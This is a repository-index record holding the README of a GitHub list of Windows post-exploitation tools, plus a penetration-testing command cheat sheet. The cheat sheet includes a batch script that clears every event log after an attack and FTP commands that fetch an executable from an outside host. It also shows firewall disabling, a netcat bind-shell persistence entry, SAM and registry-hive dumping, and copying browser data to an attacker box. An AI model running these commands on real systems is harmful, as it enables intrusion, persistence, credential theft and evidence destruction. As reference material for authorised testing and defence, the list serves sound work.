{"id":13510577,"url":"https://github.com/emilyanncr/Windows-Post-Exploitation","last_synced_at":"2025-03-30T16:34:07.774Z","repository":{"id":47375169,"uuid":"111175799","full_name":"emilyanncr/Windows-Post-Exploitation","owner":"emilyanncr","description":"Windows post-exploitation tools, resources, techniques and commands to use during post-exploitation phase of penetration test.  Contributions are appreciated.  Enjoy!","archived":false,"fork":false,"pushed_at":"2021-09-20T01:47:13.000Z","size":61,"stargazers_count":523,"open_issues_count":0,"forks_count":116,"subscribers_count":19,"default_branch":"master","last_synced_at":"2024-10-31T17:03:01.992Z","etag":null,"topics":["command-line","ethical-hacking","exploiting-windows","hacking","hacking-tool","post-exploitation"],"latest_commit_sha":null,"homepage":"","language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/emilyanncr.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2017-11-18T04:16:41.000Z","updated_at":"2024-10-25T19:43:57.000Z","dependencies_parsed_at":"2022-08-22T09:30:47.912Z","dependency_job_id":null,"html_url":"https://github.com/emilyanncr/Windows-Post-Exploitation","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/emilyanncr%2FWindows-Post-Exploitation","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/emilyanncr%2FWindows-Post-Exploitation/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/emilyanncr%2FWindows-Post-Exploitation/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/emilyanncr%2FWindows-Post-Exploitation/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/emilyanncr","download_url":"https://codeload.github.com/emilyanncr/Windows-Post-Exploitation/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":222566739,"owners_count":17004237,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["command-line","ethical-hacking","exploiting-windows","hacking","hacking-tool","post-exploitation"],"created_at":"2024-08-01T02:01:44.943Z","updated_at":"2024-11-01T11:30:41.187Z","avatar_url":"https://github.com/emilyanncr.png","language":null,"funding_links":[],"categories":["Others","📎 Pentest Methodology","General","hacking-tool"],"sub_categories":["🧿 Post-Exploitation","Other awesome-Collections"],"readme":"# Awesome Windows Post Exploitation \n\nYour contributions and suggestions are heartily♥ welcome. (✿◕‿◕). Please check the [Contributing Guidelines](CONTRIBUTING.md) for more details. This work is licensed under a [Creative Commons Attribution 4.0 International License](http://creativecommons.org/licenses/by/4.0/).\n\nThis repo houses a multitude of articles and tools relating to the post exploitation of Windows machines.  Included is a complete list of commands to use once an OS shell has been established and you're **unable** to use meterpreter for whatever reason. \u003c- You won't find a more definitive list of it's kind.\n\n## Contents\n\n* [Powershell](#powershell)\n* [Privilege Escalation Tools](#privilege-escalation-tools)\n* [Privilege Escalation Guides/Wiki](#privilege-escalation-guides/wiki)\n* [Post Exploitation Tools](#post-exploitation-tools)\n* [Post Exploitation Guides/Wiki](#post-exploitation-guides/wiki)\n* [Post Exploitation Techniques and Commands](#post-exploitation-techniques-and-commands) *Some of the commands listed are redundant.\n\n\n## PowerShell\n\n* [BloodHound](https://github.com/adaptivethreat/BloodHound) - Six Degrees of Domain Admin\n* [Empire](https://github.com/adaptivethreat/Empire) - Empire is a PowerShell and Python post-exploitation agent\n* [Generate-Macro](https://github.com/enigma0x3/Generate-Macro) - Powershell script will generate a malicious Microsoft Office document with a specified payload and persistence method\n* [Old-Powershell-payload-Excel-Delivery](https://github.com/enigma0x3/Old-Powershell-payload-Excel-Delivery) - This version touches disk for registry persistence\n* [PSRecon](https://github.com/gfoss/PSRecon) - PSRecon gathers data from a remote Windows host using PowerShell (v2 or later), organizes the data into folders, hashes all extracted data, hashes PowerShell and various system properties, and sends the data off to the security team\n* [PowerShell-Suite](https://github.com/FuzzySecurity/PowerShell-Suite) - Some useful scripts in powershell\n* [PowerSploit](https://github.com/PowerShellMafia/PowerSploit) - A PowerShell Post-Exploitation Framework\n* [PowerTools](https://github.com/PowerShellEmpire/PowerTools) - A collection of PowerShell projects with a focus on offensive operations\n* [Powershell-C2](https://github.com/enigma0x3/Powershell-C2) - A PowerShell script to maintain persistance on a Windows machine\n* [Powershell-Payload-Excel-Delivery](https://github.com/enigma0x3/Powershell-Payload-Excel-Delivery) - Uses Invoke-Shellcode to execute a payload and persist on the system\n* [mimikittenz](https://github.com/putterpanda/mimikittenz) - A post-exploitation powershell tool for extracting juicy info from memory.\n* [Empire](https://github.com/gold1029/Empire) - Empire is a post-exploitation framework that includes a pure-PowerShell2.0 Windows agent, and a pure Python 2.6/2.7 Linux/OS X agent.\n\n## Privilege Escalation Tools\n\n* [Potato](https://github.com/foxglovesec/Potato) - Privilege Escalation on Windows 7,8,10, Server 2008, Server 2012\n* [Windows Privilege Excalation](https://github.com/AusJock/Privilege-Escalation/tree/master/Windows) - Contains common local exploits and enumeration scripts\n* [Pentest Monkey Windows Privilege Escalation](http://pentestmonkey.net/uncategorized/from-local-admin-to-domain-admin) - Post-Exploitation in Windows: From Local Admin To Domain Admin (efficiently)\n* [Incognito](https://github.com/fdiskyou/incognito2) - Privilege Escalation Tool\n* [BeToot](https://github.com/AlessandroZ/BeRoot) - The BeRoot Project finds common misconfigurations that can be leveraged for privilege escalation in Windows, Linux, and OS X environments.\n\n## Privilege Escalation Guides/ Checklists\n\n* [Windows Privilege Escalation](http://www.bhafsec.com/wiki/index.php/Windows_Privilege_Escalation) - Windows Post-exploitation Wiki\n* [Windows Privilege Escalation Fundamentals](http://www.fuzzysecurity.com/tutorials/16.html) - Fundamentals of Windows Privilege Escalation\n* [Security Implications of Windows Access Tokens- A Penetration Tester's Guide](https://www.exploit-db.com/docs/english/13054-security-implications-of-windows-access-tokens.pdf) \n* [Checklist - Windows Priviliege Escalation](https://book.hacktricks.xyz/windows/checklist-windows-privilege-escalation) - Best tool to look for Windows local privilege escalation vectors.\n* [Windows Privilege Escalation guide](https://github.com/netbiosX/Checklists/blob/master/Windows-Privilege-Escalation.md) - Very throughal. Def one to check out first.\n[Privilege Escalation Windows - OSCP](https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_windows.html) - Walks you through turning low-privilege shell into privlege shell.\n\n## Post Exploitation Tools\n\n* [mimikatz](https://github.com/gentilkiwi/mimikatz) - A little tool to play with Windows security - extract plaintexts passwords, hash, PIN code and kerberos tickets from memory.\n* [Pazuzu](https://github.com/BorjaMerino/Pazuzu) - Reflective DLL to run binaries from memory\n* [UACME](https://github.com/hfiref0x/UACME) - Defeating Windows User Account Control\n* [Pupy](https://github.com/n1nj4sec/pupy) - Pupy is an opensource, cross-platform (Windows, Linux, OSX, Android) remote administration and post-exploitation tool mainly written in python.\n* [Veil Pillage](https://github.com/Veil-Framework/Veil-Pillage) - Veil-Pillage is a post-exploitation framework that integrates with Veil-Evasion.\n* [Intersect](https://github.com/deadbits/Intersect-2.5) - Post exploitation framework.\n* [Koadic](https://github.com/zerosum0x0/koadic) - Koadic, or COM Command \u0026 Control, is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire.\n* [Invoke-AltDSBackdoor](https://github.com/enigma0x3/Invoke-AltDSBackdoor) - This script will obtain persistence on a Windows 7+ machine under both Standard and Administrative accounts by using two Alternate Data Streams\n* [hackarmoury](http://hackarmoury.com) - Upload common tools from shell of compromised machine via FTP and other protocols.   \n* [Invoke-LoginPrompt](https://github.com/enigma0x3/Invoke-LoginPrompt) - Invokes a Windows Security Login Prompt and outputs the clear text password\n* [PowerHub] (https://github.com/AdrianVollmer/PowerHub) - A post exploitation tool based on a web application, focusing on bypassing endpoint protection and application whitelisting.\n* [LOLBAS and LLOLBAS] (https://github.com/LOLBAS-Project/LOLBAS) (https://github.com/AZSERG/LLOLBAS) - The LOLBAS Project helps you to search for possible privilege escalation paths on your machine whereas LLOLBAS allows you to tailor those paths to the specific machine. With these two tools combined, you are (almost) unstoppable on an engagement. And as an added benefit, it’s convenient to have offline tools available if a situation arises that demands them.\n\n\n\n\n## Post Exploitation Guides/Wikis\n\n* [Post Exploitation Wiki](https://github.com/mubix/post-exploitation-wiki) - Post exploitation wiki.\n* [Privlege escalation with Incognito](http://hardsec.net/post-exploitation-with-incognito/?lang=enPE%20with%20Incognito%C2%A0PE%20with%20Incognito) - How to use Incognito for Privilege Escalation in Windows\n* [Pwning Windows Domains from the Command Line](https://crowdshield.com/blog.php?name=pwning-windows-domains-from-the-command-line) - Several tools and techniques that can be used in order to compromise an entire Active Directory domain completely from the command line.\n* [Windows Post Exploitation Checklist](https://github.com/netbiosX/Checklists/blob/master/Windows-Privilege-Escalation.md)\n* [pwnwiki](http://pwnwiki.io) - Post Exploitation Wiki (Multi-Platform)\n* [Windows Domain: Pivot and Profit](http://www.fuzzysecurity.com/tutorials/25.html) - Techniques to move laterally when compromising a Windows machine.\n\n## Post-exploitation Techniques and Commands\n\n* [Useful Commands for Windows Administrators](http://www.robvanderwoude.com/ntadmincommands.php) - Post-exploitation techniques and commands to elicit information from shell of compromised windows machine.\n* [A-Z List of Windows Shell Commands](https://ss64.com/nt/) - A-Z Listing of all Windows CMD Commands\n* [Red Team Field Manual](https://github.com/Agahlot/RTFM/blob/master/rtfm-red-team-field-manual.pdf) - Windows Post-Exploitation techniques and commands.\n* [Windows \u0026 Active Directory Exploitation Cheat Sheet and Command Reference](https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference/) - Name says it all\n\n### Clear Log Files\nA simple script to clear logs post attack.\n\n**Create a batch file and execute it as admin.**\n\n  @echo off\n  FOR /F \"tokens=1,2*\" %%V IN ('bcdedit') DO SET adminTest=%%V\n  IF (%adminTest%)==(Access) goto noAdmin\n  for /F \"tokens=*\" %%G in ('wevtutil.exe el') DO (call :do_clear \"%%G\")\n  echo.\n  echo goto theEnd\n  :do_clear\n  echo clearing %1\n  wevtutil.exe cl %1\n  goto :eof\n  :noAdmin\n  exit\n  \n### Transfer files to compromised host via non-interactive shell \n\nIn cases where you want to upload a file onto the compromised machine but you don't have an interactive shell where you simply upload the file, you can write it onto the compromised machine using FTP, feeding it one line at a time.  \n\n**Create a blank file to write commands onto**\nftp -s:ftp_commands.txt\n\n**Echo each command (you can also do this all in one line):**\n\necho open 10.9.122.8\u003eftp_commands.txt\necho anonymous\u003eftp_commands.txt\necho blah\u003eftp_commands.txt\necho binary\u003eftp_commands.txt\necho get met8888.exe\u003eftp_commands.txt\necho bye\u003eftp_commands.txt\n\n*Instead of ftp_commands.txt, use a unique name, hide the file in a datastream, or hide the file in the folder. aka don't be obvi\n\n### Query state of Firewall, Disable Firewall, Allow a Service Through\n\n**Query state of firewall**:\n\nnetsh firewall show state\n\n**Disable firewall**\n\nnetsh.exe firewall set opmode mode=disable profile=all\n\n**Allow service through firewall**\n\nnetsh.exe firewall set portopening tcp 123 MYSERVICE enable all\n\nnetsh.exe firewall set allowedprogram C:\\MYPROGRAM.exe\n\nHKLM\\\\software\\\\microsoft\\\\windows\\\\ currentversion\\\\run –d ‘C:\\windows\\system32\\nc.exe -Ldp 4444 -e cmd.exe’ –v netcat\n\nnetsh firewall set allowedprogram c:\\nc.exe allow_nc ENABLE\n\n\n**Query current user and privilege information**\n\nwhoami\n\nwhoami /all\n\nwhoami /user\n\nwhoami /groups\n\nwhoami /priv\n\n**[Users]**\n\nnet users: list users\n\n**For more info on a user**:\n\nnet user \u003cusername\u003e (for local user)\n  \nnet user \u003cusername\u003e /domain (for a domain user)\n\n**View domain admins**:\n\nnet group \"Domain Admins\" /domain\n\n**View name of domain controller**:\n\nreg query \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\History\" /v DC\n  \n**Add user**:\n\nnet users \u003cusername\u003e \u003cpassword\u003e /add\n\n**Add user to local administrators group**:\n\nnet localgroup administrators \u003cusername\u003e /add\n\n**Delete a user**:\n\nnet users username /delete /domain\n\n**Change user's password**:\n\nnet users \u003cusername\u003e \u003cnew_password\u003e\n\n\n**[Accounts \u0026 Groups]**\n\nnet accounts\n\nnet accounts /domain\n\nnet logalgroup administrators\n\nnet localgroup administrators /dmain\n\nnet group \"domain Admins\" /domain\n\nnet group \"Enterprise Admins\" /domain\n\nnet view /localgroup\n\nnet localgroup Administrators\n\nnet localgroup /Domain\n\ngpresult: view group policy\n\ngupdate: update group policy\n\ngpresult /z\n\n**[Network and misc information]**\n\nsysteminfo:  lists information about system\n\nipconfig/all: Query ip configuation\n\nipconfig /displaydns\n\nroute print: Prints machines routing table\n\narp -a: Lists all systems current in the machine's ARP table\n\nnslookup: Query server information\n\nnbtstat: Displays protocol stats and current TCP/IP connections using NetBIOS over TCP/IP\n\nqwinsta: Query info about RDP sessions\n\nnet session: Query session information\n\nnet time \\\\computername (Shows the time of target computer)\n\nnet share: view shared resources on network\n\n\n\n**[Query current drives on system]**\n\nfsutil fsinfo drives\n\n\n**[Grab SAM and SYSTEM files]**\n\ntype \"C:/windows/repair/SAM\"\n\ntype \"C:/windows/repair/SYSTEM\"\n\n\n**[Tasks]**\n\ntasklist /svc: lists running processes\n\ntaskkill /PID \u003cprocess ID\u003e /F : forcibly kill task\n  \ntaskkill taskkill /PID xxx taskkill /IM name* of process to be terminated * can be used to kill all processes with same name\n\ntasklist /V /S computername: Lists tasks w/users running those tasks on a remote system. This will remove any IPC$ connection after it is done so if you are using another user, you need to re-initiate the IPC$ mount\n\nqprocess*: Similar to tasklist but easier to read\n\nat: Query current scheduled tasks\n\nschtasks: Query scheduled tasks that your current user has access to see.\n\nschtasks /query /fo csv /v \u003e %TEMP%\n\n\n**[Netstat]**\n\nnetstat -ano : to see what services are running on what ports\n\nnetstat -bano\n\nnetstat -r\n\nnetstat -na | findstr :443\n\n\n**[Query information about server and workstation, Workstation domain name and Logon domain]**\n\nnet config server\n\nnet config workstation\n\n\n\n**[Change drive to different drive letter]**\n\nex change to D:/ directory and list it's contents:\n\nd: \u0026 dir\n\ncd /d d: \u0026 dir\n\ndir \\\\computername\\share_or_admin_share\\ (dir list a remote directory)\n\n**[Cat contents of file located in D:/ directory]**\n\ncd /d \u0026 type d:\\blah\\blah\n\n\n**[net view]**\n\nnet view /domain[:DomainName]\n\nnet view \\\\computerName\n\n\n**[Services]**\n\n**View list processes started upon startup**\n\nnet start\n\nwmic startup get caption,command\n\n\n**[Query, Stop/Start/Pause Installed Services]**\n\nsc query state= all\n\nsc query \u003cservice\u003e\n  \nsc \u003cstop\u003e \u003cservice\u003e\n\n\n**[Remote System Access]**\n\nreg add \"HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f\n\nnet share \\\\computername\n\ntasklist /V /S computername\n\nqwinsta /SERVER:computername\n\nqprocess /SERVER:computername \n\n\n\n**[WMI]*\n\nwmic bios\n\nwmic qfe\n\nwmic qfe get hotfixid (This gets patches IDs)\n\nwmic startup\n\nwmic service\n\nwmic os\n\nwmic process get caption,executablepath,commandline\n\nwmic process call create “process_name” (executes a program)\n\nwmic process where name=”process_name” call terminate (terminates program)\n\nwmic logicaldisk where drivetype=3 get name, freespace, systemname, filesystem, size, volumeserialnumber (hard drive information)\n\nwmic useraccount (usernames, sid, and various security related goodies)\n\nwmic useraccount get /ALL\n\nwmic share get /ALL (you can use ? for gets help ! )\n\nwmic startup list full (this can be a huge list!!!) \n\nwmic /node:\"hostname\" bios get serialnumber (this can be great for finding warranty info about target)\n\n\n**[Reg Command]**\n\nreg save HKLM\\Security security.hive (Save security hive to a file)\n\nreg save HKLM\\System system.hive (Save system hive to a file)\n\nreg save HKLM\\SAM sam.hive (Save sam to a file)=\n\nreg add [\\\\TargetIPaddr\\] [RegDomain][ \\Key ]\n\nreg export [RegDomain]\\[Key] [FileName]\n\nreg import [FileName ]\n\nreg query [\\\\TargetIPaddr\\] [RegDomain]\\[ Key ] /v [Valuename!] (you can to add /s for recurse all values )\n\n\n**[Deleting Logs]**\n\nwevtutil el (list logs)\n\nwevtutil cl\n\n\n**[Uninstalling Software]**\n\nwmic proud get name /value: gets software names\n\nwmic product where name=\"XXX\": call uninstall /Interactive:Off: unintalss software\n\n\n\n**[Permissions]**\n\nicacls\n\nGrant full access over directory and encompassing folders and files:\n\nicacls \"C:\\windows\" /grant Administrator:F /T\n\nicacls \"C:\\\" /grant \"nt authority\\system\": F /T\n\n\n**[Net use]**\n\nnet use: Map network shares\n\nnet use \\\\computername (maps IPC$ which does not show up as a drive)\n\nnet use \\\\computername /user:DOMAINNAME\\username password ○ (maps IPC$ under another username)\n\n**[Mount a remote share with the rights of the current user]**:\n\nnet use K: \\\\\u003cip\u003e\\\u003cshare\u003e\n  \ndir K:\n\n**[Enable remote desktop]**\n\nreg add \"HKLM\\System\\CurrentControlSet\\Control\\TermServer\" /v fDenyTSConnections /t REG_DWORD /f\n\nnet session: list session information\n\n**[Other useful Commands]**\n\npkgmgr usefull /iu :\"Package\"\n\npkgmgr usefull /iu :\"TellnetServer\": install telnet service\n\npkgmgr /iu:\"TelnetClient\"\n\nrundll32.exe user32.dll, LockWorkStation: locks the screen\n\nwscript.exe \u003cscript js/vbs\u003e\n\ncscript.exe \u003cscript js/vbs/c#\u003e\n\nxcopy /C /S %appdata%\\Mozilla\\Firefox\\Profiles\\*.sqlite \\\\your_box\n\ntype \"C:\\documents and settings\\administrator\\userdata\\index.dat\"\n\ntype %WINDIR%\\System32\\drivers\\etc\\hosts: view contents of hosts files\n\ntype \"c:\\Documents and Settings\\Administrator\\Local Settings\\Application Data\\Microsoft\\Credentials\"\n\ncd \"C:/Documents and settings\\administrator\\userdata\" \u0026 dir\n\ntype \"c:\\Documents and Settings\\Administrator\\Desktop\\UserMysql.txt\"\n\ntype \"c:\\Documents and Settings\\Administrator\\Application Data\\MySQL\\mysqlx_user_connections.xml\"\n\ntype \"C:\\documents and settings\\administrator\\userdata\\index.dat\"\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Femilyanncr%2FWindows-Post-Exploitation","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Femilyanncr%2FWindows-Post-Exploitation","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Femilyanncr%2FWindows-Post-Exploitation/lists"}